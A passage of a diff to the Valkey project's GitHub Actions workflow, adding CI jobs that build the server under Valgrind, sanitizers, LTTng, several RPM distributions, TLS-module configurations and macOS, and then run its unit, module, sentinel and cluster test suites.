$GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make valgrind all-with-unit-tests CFLAGS="-DNO_MALLOC_USABLE_SIZE" SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx valgrind -y + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --valgrind --no-latency --verbose --clients 1 --timeout 2400 --dump-logs ${{github.event.inputs.test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + ./deps/gtest-parallel/gtest-parallel valgrind -- --track-origins=yes --suppressions=./src/valgrind.sup --show-reachable=no --show-possibly-lost=no --leak-check=full --log-file=err.%p.txt ./src/unit/valkey-unit-gtests --valgrind + if grep -qlE '0x[0-9A-Fa-f]+:' err.*.txt 2>/dev/null; then grep -lE '0x[0-9A-Fa-f]+:' err.*.txt | xargs cat; exit 1; fi + elif [ -f ./src/valkey-unit-tests ]; then + valgrind --track-origins=yes --suppressions=./src/valgrind.sup --show-reachable=no --show-possibly-lost=no --leak-check=full --log-file=err.txt ./src/valkey-unit-tests --valgrind + if grep -q 0x err.txt; then cat err.txt; exit 1; fi + fi + test-sanitizer-address: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'sanitizer') + timeout-minutes: 1440 + strategy: + fail-fast: false + matrix: + compiler: [gcc, clang] + env: + CC: ${{ matrix.compiler }} + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests OPT=-O3 SANITIZER=address SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx -y + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --accurate --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests + fi + # Large-memory tests with sanitizers require 10-14GB RAM due to ASAN/UBSAN overhead. + # GitHub-hosted runners for public repos provide 16GB (ubuntu-latest). + # These tests are borderline - monitoring memory usage to determine if they can run reliably. + test-sanitizer-address-large-memory: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'sanitizer') && + !contains(github.event.inputs.skiptests, 'large-memory') + timeout-minutes: 1440 + strategy: + fail-fast: false + matrix: + compiler: [gcc, clang] + env: + CC: ${{ matrix.compiler }} + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - name: Log runner memory + run: free -h + - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests OPT=-O3 SANITIZER=address SERVER_CFLAGS='-Werror' + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx -y + - name: Start memory monitor + run: | + # Track minimum free memory to detect OOM risk + (while true; do + FREE=$(awk '/MemAvailable/ {print $2}' /proc/meminfo) + echo "$FREE" >> /tmp/memfree.log + sleep 5 + done) & + echo $! > /tmp/memmon.pid + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit large_memory=1 + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --large-memory + fi + - name: large memory tests + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --accurate --verbose --dump-logs --clients 1 --large-memory --tags large-memory ${{github.event.inputs.test_args}} + - name: large memory module api tests + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs --clients 1 --large-memory --tags large-memory ${{github.event.inputs.test_args}} + - name: Memory usage summary + if: always() + run: | + kill $(cat /tmp/memmon.pid) 2>/dev/null || true + echo "=== Memory Summary ===" + printf "Total RAM: %.1fGB\n" $(awk '/MemTotal/ {print $2/1024/1024}' /proc/meminfo) + if [ -f /tmp/memfree.log ]; then + MIN_FREE=$(sort -n /tmp/memfree.log | head -1) + printf "Minimum free memory: %.1fGB\n" $(echo "$MIN_FREE/1024/1024" | bc -l) + fi + test-sanitizer-undefined: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'sanitizer') + timeout-minutes: 1440 + strategy: + fail-fast: false + matrix: + compiler: [gcc, clang] + env: + CC: ${{ matrix.compiler }} + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests OPT=-O3 SANITIZER=undefined SERVER_CFLAGS='-Werror' LUA_DEBUG=yes USE_LIBBACKTRACE=yes # we (ab)use this flow to also check Lua C API violations + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx -y + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --accurate --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit accurate=1 + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --accurate + fi + # Large-memory tests with sanitizers require 10-14GB RAM due to ASAN/UBSAN overhead. + # GitHub-hosted runners for public repos provide 16GB (ubuntu-latest). + # These tests are borderline - monitoring memory usage to determine if they can run reliably. + test-sanitizer-undefined-large-memory: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'sanitizer') && + !contains(github.event.inputs.skiptests, 'large-memory') + timeout-minutes: 1440 + strategy: + fail-fast: false + matrix: + compiler: [gcc, clang] + env: + CC: ${{ matrix.compiler }} + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - name: Log runner memory + run: free -h + - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests OPT=-O3 SANITIZER=undefined SERVER_CFLAGS='-Werror' LUA_DEBUG=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx -y + - name: Start memory monitor + run: | + # Track minimum free memory to detect OOM risk + (while true; do + FREE=$(awk '/MemAvailable/ {print $2}' /proc/meminfo) + echo "$FREE" >> /tmp/memfree.log + sleep 5 + done) & + echo $! > /tmp/memmon.pid + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit accurate=1 large_memory=1 + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --accurate --large-memory + fi + - name: large memory tests + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --accurate --verbose --dump-logs --clients 1 --large-memory --tags large-memory ${{github.event.inputs.test_args}} + - name: large memory module api tests + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs --clients 1 --large-memory --tags large-memory ${{github.event.inputs.test_args}} + - name: Memory usage summary + if: always() + run: | + kill $(cat /tmp/memmon.pid) 2>/dev/null || true + echo "=== Memory Summary ===" + printf "Total RAM: %.1fGB\n" $(awk '/MemTotal/ {print $2/1024/1024}' /proc/meminfo) + if [ -f /tmp/memfree.log ]; then + MIN_FREE=$(sort -n /tmp/memfree.log | head -1) + printf "Minimum free memory: %.1fGB\n" $(echo "$MIN_FREE/1024/1024" | bc -l) + fi + test-sanitizer-force-defrag: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'sanitizer') + timeout-minutes: 1440 + strategy: + fail-fast: false + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests OPT=-O3 SANITIZER=address DEBUG_FORCE_DEFRAG=yes USE_JEMALLOC=no SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx -y + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --accurate --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests + fi + test-ubuntu-lttng: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'lttng') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + sudo apt-get update && sudo apt-get install lttng-tools lttng-modules-dkms liblttng-ust-dev + cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make -j4 USE_LTTNG=yes USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-rpm-distros-jemalloc: + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'rpm-distros') + strategy: + fail-fast: false + matrix: + include: + - name: test-almalinux8-jemalloc + container: almalinux:8 + install_epel: true + - name: test-almalinux9-jemalloc + container: almalinux:9 + install_epel: true + - name: test-centosstream9-jemalloc + container: quay.io/centos/centos:stream9 + install_epel: true + - name: test-fedoralatest-jemalloc + container: fedora:latest + - name: test-fedorarawhide-jemalloc + container: fedora:rawhide + name: ${{ matrix.name }} + runs-on: ubuntu-latest + container: ${{ matrix.container }} + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install EPEL + if: matrix.install_epel + run: dnf -y install epel-release + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + dnf -y install gcc make procps-ng which /usr/bin/kill /usr/bin/awk + cd libbacktrace && ./configure && make && make install + - name: make + run: make -j SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: dnf -y install tcl tcltls + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-rpm-distros-tls-module: + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'tls') + strategy: + fail-fast: false + matrix: + include: + - name: test-almalinux8-tls-module + container: almalinux:8 + install_epel: true + - name: test-almalinux9-tls-module + container: almalinux:9 + install_epel: true + - name: test-centosstream9-tls-module + container: quay.io/centos/centos:stream9 + install_epel: true + - name: test-fedoralatest-tls-module + container: fedora:latest + - name: test-fedorarawhide-tls-module + container: fedora:rawhide + name: ${{ matrix.name }} + runs-on: ubuntu-latest + container: ${{ matrix.container }} + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install EPEL + if: matrix.install_epel + run: dnf -y install epel-release + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + dnf -y install make gcc openssl-devel openssl procps-ng which /usr/bin/kill /usr/bin/awk + cd libbacktrace && ./configure && make && make install + - name: make + run: make -j BUILD_TLS=module SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + dnf -y install tcl tcltls + ./utils/gen-test-certs.sh + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: | + ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs --tls-module --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: | + CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs --tls-module --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: | + ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: | + ./runtest-cluster --tls-module ${{github.event.inputs.cluster_test_args}} + test-rpm-distros-tls-module-no-tls: + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'tls') + strategy: + fail-fast: false + matrix: + include: + - name: test-almalinux8-tls-module-no-tls + container: almalinux:8 + install_epel: true + - name: test-almalinux9-tls-module-no-tls + container: almalinux:9 + install_epel: true + - name: test-centosstream9-tls-module-no-tls + container: quay.io/centos/centos:stream9 + install_epel: true + - name: test-fedoralatest-tls-module-no-tls + container: fedora:latest + - name: test-fedorarawhide-tls-module-no-tls + container: fedora:rawhide + name: ${{ matrix.name }} + runs-on: ubuntu-latest + container: ${{ matrix.container }} + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install EPEL + if: matrix.install_epel + run: dnf -y install epel-release + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + dnf -y install make gcc openssl-devel openssl procps-ng which /usr/bin/kill /usr/bin/awk + cd libbacktrace && ./configure && make && make install + - name: make + run: make -j BUILD_TLS=module SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + dnf -y install tcl tcltls + ./utils/gen-test-certs.sh + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: | + ./runtest --accurate --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: | + CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: | + ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: | + ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-macos-latest: + runs-on: macos-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'macos') && !(contains(github.event.inputs.skiptests, 'valkey') && contains(github.event.inputs.skiptests, 'modules')) + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: 